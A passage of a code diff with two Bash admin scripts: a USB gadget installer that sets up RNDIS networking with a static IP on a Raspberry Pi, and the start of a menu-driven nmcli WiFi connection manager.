"INFO") echo -e "${BLUE}$message${NC}" ;;
*) echo -e "$message" ;;
esac
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
    if [ $? -eq 0 ]; then
        log "SUCCESS" "$1"
    else
        handle_error "Failed: $1"
    fi
}
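# Usage sketch: check_success examines $? from the immediately preceding
# command, so it must be called right after the command it guards, e.g.:
#   cp /boot/firmware/config.txt /tmp/config.txt.bak
#   check_success "Backed up config.txt"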
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install USB Gadget"
echo -e " ${BLUE}-u${NC} Uninstall USB Gadget"
echo -e " ${BLUE}-l${NC} List USB Gadget Information"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install USB Gadget"
echo -e " $0 -u Uninstall USB Gadget"
echo -e " $0 -l List USB Gadget Information"
echo -e " $0 -h Show help"
echo -e ""
echo -e "${YELLOW}===== RNDIS Configuration Procedure =====${NC}"
echo -e "To configure the RNDIS driver and set the IP address, subnet mask, and gateway for the RNDIS network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the USB gadget, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart usb-gadget.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the RNDIS network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "===== End of Procedure =====${NC}"
exit 1
}
# ============================================================
# Function to Install USB Gadget with RNDIS
# ============================================================
install_usb_gadget() {
log "INFO" "Starting USB Gadget installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Backup cmdline.txt and config.txt if not already backed up
if [ ! -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt /boot/firmware/cmdline.txt.bak
check_success "Backed up /boot/firmware/cmdline.txt to /boot/firmware/cmdline.txt.bak"
else
log "INFO" "/boot/firmware/cmdline.txt.bak already exists. Skipping backup."
fi
if [ ! -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt /boot/firmware/config.txt.bak
check_success "Backed up /boot/firmware/config.txt to /boot/firmware/config.txt.bak"
else
log "INFO" "/boot/firmware/config.txt.bak already exists. Skipping backup."
fi
# Modify cmdline.txt: Remove existing modules-load entries related to dwc2
log "INFO" "Cleaning up existing modules-load entries in /boot/firmware/cmdline.txt"
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
check_success "Removed duplicate modules-load entries from /boot/firmware/cmdline.txt"
# Add a single modules-load=dwc2,g_rndis if not present
if ! grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_rndis/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_rndis to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_rndis already present in /boot/firmware/cmdline.txt"
fi
# Add a single modules-load=dwc2,g_ether if not present
if ! grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_ether/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_ether to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_ether already present in /boot/firmware/cmdline.txt"
fi
# Modify config.txt: Remove duplicate dtoverlay=dwc2 entries
log "INFO" "Cleaning up existing dtoverlay=dwc2 entries in /boot/firmware/config.txt"
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
check_success "Removed duplicate dtoverlay=dwc2 entries from /boot/firmware/config.txt"
# Append a single dtoverlay=dwc2 if not present
if ! grep -q "^dtoverlay=dwc2$" /boot/firmware/config.txt; then
echo "dtoverlay=dwc2" | sudo tee -a /boot/firmware/config.txt
check_success "Appended dtoverlay=dwc2 to /boot/firmware/config.txt"
else
log "INFO" "dtoverlay=dwc2 already present in /boot/firmware/config.txt"
fi
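    # Expected end state (sketch): /boot/firmware/config.txt contains exactly one
    #   dtoverlay=dwc2
    # line, which enables the dwc2 USB device-controller overlay at boot.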
# Create USB gadget script
if [ ! -f /usr/local/bin/usb-gadget.sh ]; then
log "INFO" "Creating USB gadget script at /usr/local/bin/usb-gadget.sh"
cat > /usr/local/bin/usb-gadget.sh << 'EOF'
#!/bin/bash
set -e
# Enable debug mode for detailed logging
set -x
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: RNDIS Network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/rndis.usb0
# Remove existing symlink if it exists to prevent duplicates
if [ -L configs/c.1/rndis.usb0 ]; then
rm configs/c.1/rndis.usb0
fi
ln -s functions/rndis.usb0 configs/c.1/
# Wait until a USB device controller is available
max_retries=10
retry_count=0
while [ -z "$(ls /sys/class/udc 2>/dev/null)" ]; do
    if [ $retry_count -ge $max_retries ]; then
        echo "Error: no USB device controller found after $max_retries attempts."
        exit 1
    fi
    retry_count=$((retry_count + 1))
    sleep 1
done
# Assign the USB Device Controller (UDC) exactly once; writing the controller
# name to UDC a second time fails with "Device or resource busy"
UDC_NAME=$(ls /sys/class/udc | head -n 1)
echo "$UDC_NAME" > UDC
echo "Assigned UDC: $UDC_NAME"
# Check if the usb0 interface is already configured
if ! ip addr show usb0 2>/dev/null | grep -q "172.20.2.1"; then
    ip addr add 172.20.2.1/24 dev usb0
    ip link set usb0 up
    echo "Configured usb0 with IP 172.20.2.1"
else
    echo "Interface usb0 already configured."
fi
EOF
chmod +x /usr/local/bin/usb-gadget.sh
check_success "Created and made USB gadget script executable at /usr/local/bin/usb-gadget.sh"
else
log "INFO" "USB gadget script /usr/local/bin/usb-gadget.sh already exists. Skipping creation."
fi
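    # To sanity-check the gadget after a reboot (example commands, not run by this script):
    #   cat /sys/kernel/config/usb_gadget/g1/UDC   # name of the bound controller
    #   ip addr show usb0                          # should list 172.20.2.1/24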
# Create USB gadget service
if [ ! -f /etc/systemd/system/usb-gadget.service ]; then
log "INFO" "Creating USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
cat > /etc/systemd/system/usb-gadget.service << EOF
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
check_success "Created USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
else
log "INFO" "USB gadget systemd service /etc/systemd/system/usb-gadget.service already exists. Skipping creation."
fi
# Configure network interface: Remove duplicate entries first
log "INFO" "Cleaning up existing network interface configurations for usb0 in /etc/network/interfaces"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
# Remove all lines starting with allow-hotplug usb0 and the following lines (iface and settings)
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed existing network interface configurations for usb0 from /etc/network/interfaces"
else
log "INFO" "No existing network interface configuration for usb0 found in /etc/network/interfaces."
fi
# Append network interface configuration for usb0 if not already present
if ! grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Appending network interface configuration for usb0 to /etc/network/interfaces"
cat >> /etc/network/interfaces << EOF
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
gateway 172.20.2.1
EOF
check_success "Appended network interface configuration for usb0 to /etc/network/interfaces"
else
log "INFO" "Network interface usb0 already configured in /etc/network/interfaces"
fi
# Reload systemd daemon and enable/start services
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "INFO" "Enabling systemd-networkd service"
systemctl enable systemd-networkd
check_success "Enabled systemd-networkd service"
log "INFO" "Enabling usb-gadget service"
systemctl enable usb-gadget.service
check_success "Enabled usb-gadget service"
log "INFO" "Starting systemd-networkd service"
systemctl start systemd-networkd
check_success "Started systemd-networkd service"
log "INFO" "Starting usb-gadget service"
systemctl start usb-gadget.service
check_success "Started usb-gadget service"
log "SUCCESS" "USB Gadget installation completed successfully."
}
# ============================================================
# Function to Uninstall USB Gadget
# ============================================================
uninstall_usb_gadget() {
log "INFO" "Starting USB Gadget uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Stop and disable USB gadget service
if systemctl is-active --quiet usb-gadget.service; then
systemctl stop usb-gadget.service
check_success "Stopped usb-gadget.service"
else
log "INFO" "usb-gadget.service is not running."
fi
if systemctl is-enabled --quiet usb-gadget.service; then
systemctl disable usb-gadget.service
check_success "Disabled usb-gadget.service"
else
log "INFO" "usb-gadget.service is not enabled."
fi
# Remove USB gadget service file
if [ -f /etc/systemd/system/usb-gadget.service ]; then
rm /etc/systemd/system/usb-gadget.service
check_success "Removed /etc/systemd/system/usb-gadget.service"
else
log "INFO" "/etc/systemd/system/usb-gadget.service does not exist. Skipping removal."
fi
# Remove USB gadget script
if [ -f /usr/local/bin/usb-gadget.sh ]; then
rm /usr/local/bin/usb-gadget.sh
check_success "Removed /usr/local/bin/usb-gadget.sh"
else
log "INFO" "/usr/local/bin/usb-gadget.sh does not exist. Skipping removal."
fi
# Restore cmdline.txt and config.txt from backups
if [ -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt.bak /boot/firmware/cmdline.txt
chmod 644 /boot/firmware/cmdline.txt
check_success "Restored /boot/firmware/cmdline.txt from backup"
else
log "WARNING" "Backup /boot/firmware/cmdline.txt.bak not found. Skipping restoration."
fi
if [ -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt.bak /boot/firmware/config.txt
check_success "Restored /boot/firmware/config.txt from backup"
else
log "WARNING" "Backup /boot/firmware/config.txt.bak not found. Skipping restoration."
fi
# Remove network interface configuration for usb0: Remove all related lines
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Removing network interface configuration for usb0 from /etc/network/interfaces"
# Remove lines from allow-hotplug usb0 up to the next empty line
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed network interface configuration for usb0 from /etc/network/interfaces"
else
log "INFO" "Network interface usb0 not found in /etc/network/interfaces. Skipping removal."
fi
# Reload systemd daemon
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Disable and stop systemd-networkd service
if systemctl is-active --quiet systemd-networkd; then
systemctl stop systemd-networkd
check_success "Stopped systemd-networkd service"
else
log "INFO" "systemd-networkd service is not running."
fi
if systemctl is-enabled --quiet systemd-networkd; then
systemctl disable systemd-networkd
check_success "Disabled systemd-networkd service"
else
log "INFO" "systemd-networkd service is not enabled."
fi
# Clean up any remaining duplicate entries in cmdline.txt and config.txt
log "INFO" "Ensuring no duplicate entries remain in configuration files."
# Remove any remaining modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
# Remove any remaining dtoverlay=dwc2
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
log "INFO" "Cleaned up duplicate entries in /boot/firmware/cmdline.txt and /boot/firmware/config.txt"
log "SUCCESS" "USB Gadget uninstallation completed successfully."
}
# ============================================================
# Function to List USB Gadget Information
# ============================================================
list_usb_gadget_info() {
echo -e "${CYAN}===== USB Gadget Information =====${NC}"
# Check status of usb-gadget service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q usb-gadget.service; then
systemctl status usb-gadget.service --no-pager
else
echo -e "${RED}usb-gadget.service is not installed.${NC}"
fi
# Check if USB gadget script exists
echo -e "\n${YELLOW}USB Gadget Script:${NC}"
if [ -f /usr/local/bin/usb-gadget.sh ]; then
echo -e "${GREEN}/usr/local/bin/usb-gadget.sh exists.${NC}"
else
echo -e "${RED}/usr/local/bin/usb-gadget.sh does not exist.${NC}"
fi
# Check network interface configuration
echo -e "\n${YELLOW}Network Interface Configuration for usb0:${NC}"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
grep "^allow-hotplug usb0" /etc/network/interfaces -A 4
else
echo -e "${RED}No network interface configuration found for usb0.${NC}"
fi
# Check cmdline.txt
echo -e "\n${YELLOW}/boot/firmware/cmdline.txt:${NC}"
if grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt && grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
echo -e "${GREEN}modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether are present.${NC}"
else
echo -e "${RED}modules-load=dwc2,g_rndis and/or modules-load=dwc2,g_ether are not present.${NC}"
fi
# Check config.txt
echo -e "\n${YELLOW}/boot/firmware/config.txt:${NC}"
if grep -q "^dtoverlay=dwc2" /boot/firmware/config.txt; then
echo -e "${GREEN}dtoverlay=dwc2 is present.${NC}"
else
echo -e "${RED}dtoverlay=dwc2 is not present.${NC}"
fi
# Check if systemd-networkd is enabled
echo -e "\n${YELLOW}systemd-networkd Service:${NC}"
if systemctl is-enabled --quiet systemd-networkd; then
systemctl is-active systemd-networkd && echo -e "${GREEN}systemd-networkd is active.${NC}" || echo -e "${RED}systemd-networkd is inactive.${NC}"
else
echo -e "${RED}systemd-networkd is not enabled.${NC}"
fi
echo -e "\n===== End of Information ====="
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ USB Gadget Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List USB Gadget Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
case $choice in
1)
install_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
;;
2)
uninstall_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
;;
3)
list_usb_gadget_info
echo ""
read -p "Press Enter to return to the menu..."
;;
4)
show_usage
;;
5)
log "INFO" "Exiting USB Gadget Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_usb_gadget
exit 0
;;
u)
uninstall_usb_gadget
exit 0
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
\?)
echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

bjorn_wifi.sh Normal file

@@ -0,0 +1,786 @@
#!/bin/bash
# WiFi Manager Script Using nmcli
# Author: Infinition
# Version: 1.6
# Description: This script provides a simple menu interface to manage WiFi connections using nmcli.
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
PURPLE='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
case $level in
"INFO") echo -e "${GREEN}[INFO]${NC} $*" ;;
"WARN") echo -e "${YELLOW}[WARN]${NC} $*" ;;
"ERROR") echo -e "${RED}[ERROR]${NC} $*" ;;
"DEBUG") echo -e "${BLUE}[DEBUG]${NC} $*" ;;
esac
}
# ============================================================
# Check if Script is Run as Root
# ============================================================
if [ "$EUID" -ne 0 ]; then
log "ERROR" "This script must be run as root."
exit 1
fi
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e " ${BLUE}-f${NC} Force refresh of WiFi connections"
echo -e " ${BLUE}-c${NC} Clear all saved WiFi connections"
echo -e " ${BLUE}-l${NC} List all available WiFi networks"
echo -e " ${BLUE}-s${NC} Show current WiFi status"
echo -e " ${BLUE}-a${NC} Add a new WiFi connection"
echo -e " ${BLUE}-d${NC} Delete a WiFi connection"
echo -e " ${BLUE}-m${NC} Manage WiFi Connections"
echo -e ""
echo -e "Example: $0 -a"
exit 1
}
# ============================================================
# Function to Check Prerequisites
# ============================================================
check_prerequisites() {
log "INFO" "Checking prerequisites..."
local missing_packages=()
# Check if nmcli is installed
if ! command -v nmcli &> /dev/null; then
missing_packages+=("network-manager")
fi
# Check if NetworkManager service is running
if ! systemctl is-active --quiet NetworkManager; then
log "WARN" "NetworkManager service is not running. Attempting to start it..."
systemctl start NetworkManager
sleep 2
if ! systemctl is-active --quiet NetworkManager; then
log "ERROR" "Failed to start NetworkManager. Please install and start it manually."
exit 1
else
log "INFO" "NetworkManager started successfully."
fi
fi
# Install missing packages if any
if [ ${#missing_packages[@]} -gt 0 ]; then
log "WARN" "Missing packages: ${missing_packages[*]}"
log "INFO" "Attempting to install missing packages..."
apt-get update
apt-get install -y "${missing_packages[@]}"
# Verify installation
for package in "${missing_packages[@]}"; do
if ! dpkg -s "$package" &> /dev/null; then
log "ERROR" "Failed to install $package."
exit 1
fi
done
fi
log "INFO" "All prerequisites are met."
}
# ============================================================
# Function to Handle preconfigured.nmconnection
# ============================================================
handle_preconfigured_connection() {
preconfigured_file="/etc/NetworkManager/system-connections/preconfigured.nmconnection"
if [ -f "$preconfigured_file" ]; then
echo -e "${YELLOW}A preconfigured WiFi connection exists (preconfigured.nmconnection).${NC}"
echo -n -e "${GREEN}Do you want to delete it and recreate connections with individual SSIDs? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
# Extract SSID from preconfigured.nmconnection
ssid=$(grep "^ssid=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
if [ -z "$ssid" ]; then
log "WARN" "SSID not found in preconfigured.nmconnection. Cannot recreate connection."
else
# Extract security type
security=$(grep "^security=" "$preconfigured_file" | cut -d'=' -f2 | tr -d '"')
# Delete preconfigured.nmconnection
log "INFO" "Deleting preconfigured.nmconnection..."
rm "$preconfigured_file"
systemctl restart NetworkManager
sleep 2
# Recreate the connection with SSID name
echo -n -e "${GREEN}Do you want to recreate the connection for SSID '$ssid'? (y/n): ${NC}"
read recreate_confirm
if [[ "$recreate_confirm" =~ ^[Yy]$ ]]; then
# Check if connection already exists
if nmcli connection show "$ssid" &> /dev/null; then
log "WARN" "A connection named '$ssid' already exists."
else
# Prompt for password if necessary
if [ "$security" == "none" ] || [ "$security" == "--" ] || [ -z "$security" ]; then
    # Open network
    log "INFO" "Creating open connection for SSID '$ssid'..."
    if nmcli device wifi connect "$ssid" name "$ssid"; then
        log "INFO" "Successfully recreated connection for '$ssid'."
    else
        log "ERROR" "Failed to recreate connection for '$ssid'."
    fi
else
    # Secured network
    echo -n -e "${GREEN}Enter WiFi Password for '$ssid': ${NC}"
    read -s password
    echo ""
    if [ -z "$password" ]; then
        log "ERROR" "Password cannot be empty."
    elif nmcli device wifi connect "$ssid" password "$password" name "$ssid"; then
        log "INFO" "Successfully recreated connection for '$ssid'."
    else
        log "ERROR" "Failed to recreate connection for '$ssid'."
    fi
fi
fi
else
log "INFO" "Connection recreation cancelled."
fi
fi
else
log "INFO" "Preconfigured connection retained."
fi
fi
}
# ============================================================
# Function to List All Available WiFi Networks and Connect
# ============================================================
list_wifi_and_connect() {
    log "INFO" "Scanning for available WiFi networks..."
    nmcli device wifi rescan
    sleep 2

    # Helper: confirm, prompt for a password if needed, and connect to SSIDs[$1].
    # Returns 1 when the attempt was aborted (e.g. empty password).
    connect_to_selection() {
        local selection=$1
        local ssid_selected="${SSIDs[$selection]}"
        local security_selected="${SECURITIES[$selection]}"
        echo -n -e "${GREEN}Do you want to connect to '$ssid_selected'? (y/n): ${NC}"
        read confirm
        if [[ "$confirm" =~ ^[Yy]$ ]]; then
            if [ "$security_selected" == "--" ] || [ -z "$security_selected" ]; then
                # Open network
                log "INFO" "Connecting to open network '$ssid_selected'..."
                nmcli device wifi connect "$ssid_selected" name "$ssid_selected"
            else
                # Secured network
                echo -n -e "${GREEN}Enter WiFi Password for '$ssid_selected': ${NC}"
                read -s password
                echo ""
                if [ -z "$password" ]; then
                    log "ERROR" "Password cannot be empty."
                    return 1
                fi
                log "INFO" "Connecting to '$ssid_selected'..."
                nmcli device wifi connect "$ssid_selected" password "$password" name "$ssid_selected"
            fi
            if [ $? -eq 0 ]; then
                log "INFO" "Successfully connected to '$ssid_selected'."
            else
                log "ERROR" "Failed to connect to '$ssid_selected'."
            fi
        else
            log "INFO" "Operation cancelled."
        fi
        echo ""
        read -p "Press Enter to continue..."
        return 0
    }

    while true; do
        clear
        index=1
        declare -A SSIDs
        declare -A SECURITIES
        available_networks=$(nmcli -t -f SSID,SECURITY device wifi list)
        if [ -z "$available_networks" ]; then
            log "WARN" "No WiFi networks found."
            echo ""
        else
            # Remove lines with empty SSIDs (hidden networks)
            network_list=$(echo "$available_networks" | grep -v '^:$')
            if [ -z "$network_list" ]; then
                log "WARN" "No visible WiFi networks found."
                echo ""
            else
                echo -e "${CYAN}Available WiFi Networks:${NC}"
                while IFS=: read -r ssid security; do
                    # Handle hidden SSIDs
                    [ -z "$ssid" ] && ssid="<Hidden SSID>"
                    SSIDs["$index"]="$ssid"
                    SECURITIES["$index"]="$security"
                    printf "%d. %-40s (%s)\n" "$index" "$ssid" "$security"
                    index=$((index + 1))
                done <<< "$network_list"
            fi
        fi
        echo ""
        echo -e "${YELLOW}The list refreshes every 5 seconds. Enter a number to connect, 'c' to pick from the list, or 'q' to quit.${NC}"
        echo -n -e "${GREEN}Enter choice (number/c/q): ${NC}"
        if read -t 5 input; then
            case "$input" in
                [Qq])
                    log "INFO" "Exiting WiFi list."
                    return
                    ;;
                [Cc])
                    echo ""
                    echo -n -e "${GREEN}Enter the number of the network to connect: ${NC}"
                    read selection
                    ;;
                *)
                    selection="$input"
                    ;;
            esac
            if [[ -z "$selection" ]]; then
                log "INFO" "Operation cancelled."
                continue
            fi
            # Validate selection
            if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
                log "ERROR" "Invalid selection. Please enter a valid number."
                sleep 2
                continue
            fi
            max_index=$((index - 1))
            if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
                log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
                sleep 2
                continue
            fi
            connect_to_selection "$selection" || { sleep 2; continue; }
        fi
    done
}
# ============================================================
# Function to Show Current WiFi Status
# ============================================================
show_wifi_status() {
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Current WiFi Status ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
# Check if WiFi is enabled
wifi_enabled=$(nmcli radio wifi)
echo -e "▶ WiFi Enabled : ${wifi_enabled}"
# Show active connection
# Use NAME instead of SSID so all active connection types are reported
active_conn=$(nmcli -t -f ACTIVE,NAME connection show --active | grep '^yes' | cut -d':' -f2)
if [ -n "$active_conn" ]; then
echo -e "▶ Connected to : ${GREEN}$active_conn${NC}"
else
echo -e "▶ Connected to : ${RED}Not Connected${NC}"
fi
# Show all saved connections
echo -e "\n${CYAN}Saved WiFi Connections:${NC}"
nmcli connection show | grep wifi
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Add a New WiFi Connection
# ============================================================
add_wifi_connection() {
echo -e "${CYAN}Add a New WiFi Connection${NC}"
echo -n "Enter SSID (Network Name): "
read ssid
echo -n "Enter WiFi Password (leave empty for open network): "
read -s password
echo ""
if [ -z "$ssid" ]; then
log "ERROR" "SSID cannot be empty."
sleep 2
return
fi
if [ -n "$password" ]; then
    log "INFO" "Adding new WiFi connection for SSID: $ssid"
    nmcli device wifi connect "$ssid" password "$password" name "$ssid"
else
    log "INFO" "Adding new open WiFi connection for SSID: $ssid"
    nmcli device wifi connect "$ssid" name "$ssid"
fi
if [ $? -eq 0 ]; then
log "INFO" "Successfully connected to '$ssid'."
else
log "ERROR" "Failed to connect to '$ssid'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Delete a WiFi Connection
# ============================================================
delete_wifi_connection() {
echo -e "${CYAN}Delete a WiFi Connection${NC}"
# Correctly filter connections by type '802-11-wireless'
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
if [ -z "$connections" ]; then
log "WARN" "No WiFi connections available to delete."
echo ""
read -p "Press Enter to return to the menu..."
return
fi
echo -e "${CYAN}Available WiFi Connections:${NC}"
index=1
declare -A CONNECTIONS
while IFS= read -r conn; do
echo -e "$index. $conn"
CONNECTIONS["$index"]="$conn"
index=$((index + 1))
done <<< "$connections"
echo ""
echo -n -e "${GREEN}Enter the number of the connection to delete (or press Enter to cancel): ${NC}"
read selection
if [[ -z "$selection" ]]; then
log "INFO" "Operation cancelled."
sleep 1
return
fi
# Validate selection
if ! [[ "$selection" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection. Please enter a valid number."
sleep 2
return
fi
max_index=$((index - 1))
if [ "$selection" -lt 1 ] || [ "$selection" -gt "$max_index" ]; then
log "ERROR" "Invalid selection. Please enter a number between 1 and $max_index."
sleep 2
return
fi
conn_name="${CONNECTIONS[$selection]}"
# Backup the connection before deletion
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
backup_file="$backup_dir/${conn_name}.nmconnection"
if nmcli connection show "$conn_name" &> /dev/null; then
log "INFO" "Backing up connection '$conn_name'..."
cp "/etc/NetworkManager/system-connections/$conn_name.nmconnection" "$backup_file" 2>/dev/null
if [ $? -eq 0 ]; then
log "INFO" "Backup saved to '$backup_file'."
else
log "WARN" "Failed to backup connection. It might not be a preconfigured connection or backup location is inaccessible."
fi
else
log "WARN" "Connection '$conn_name' does not exist or cannot be backed up."
fi
log "INFO" "Deleting WiFi connection: $conn_name"
nmcli connection delete "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully deleted '$conn_name'."
else
log "ERROR" "Failed to delete '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Clear All Saved WiFi Connections
# ============================================================
clear_all_connections() {
echo -e "${YELLOW}Are you sure you want to delete all saved WiFi connections? (y/n): ${NC}"
read confirm
if [[ "$confirm" =~ ^[Yy]$ ]]; then
log "INFO" "Deleting all saved WiFi connections..."
connections=$(nmcli -t -f NAME,TYPE connection show | awk -F: '$2 == "802-11-wireless" {print $1}')
backup_dir="$HOME/wifi_connection_backups"
mkdir -p "$backup_dir"
# Read line by line so connection names containing spaces are handled correctly
while IFS= read -r conn; do
    [ -z "$conn" ] && continue
    # Backup before deletion
    backup_file="$backup_dir/${conn}.nmconnection"
    if nmcli connection show "$conn" &> /dev/null; then
        if cp "/etc/NetworkManager/system-connections/$conn.nmconnection" "$backup_file" 2>/dev/null; then
            log "INFO" "Backup saved to '$backup_file'."
        else
            log "WARN" "Failed to backup connection '$conn'."
        fi
    fi
    nmcli connection delete "$conn"
    log "INFO" "Deleted connection: $conn"
done <<< "$connections"
log "INFO" "All saved WiFi connections have been deleted."
else
log "INFO" "Operation cancelled."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Manage WiFi Connections
# ============================================================
manage_wifi_connections() {
while true; do
clear
echo -e "${CYAN}Manage WiFi Connections${NC}"
echo -e "1. List WiFi Connections"
echo -e "2. Delete a WiFi Connection"
echo -e "3. Recreate a WiFi Connection from Backup"
echo -e "4. Back to Main Menu"
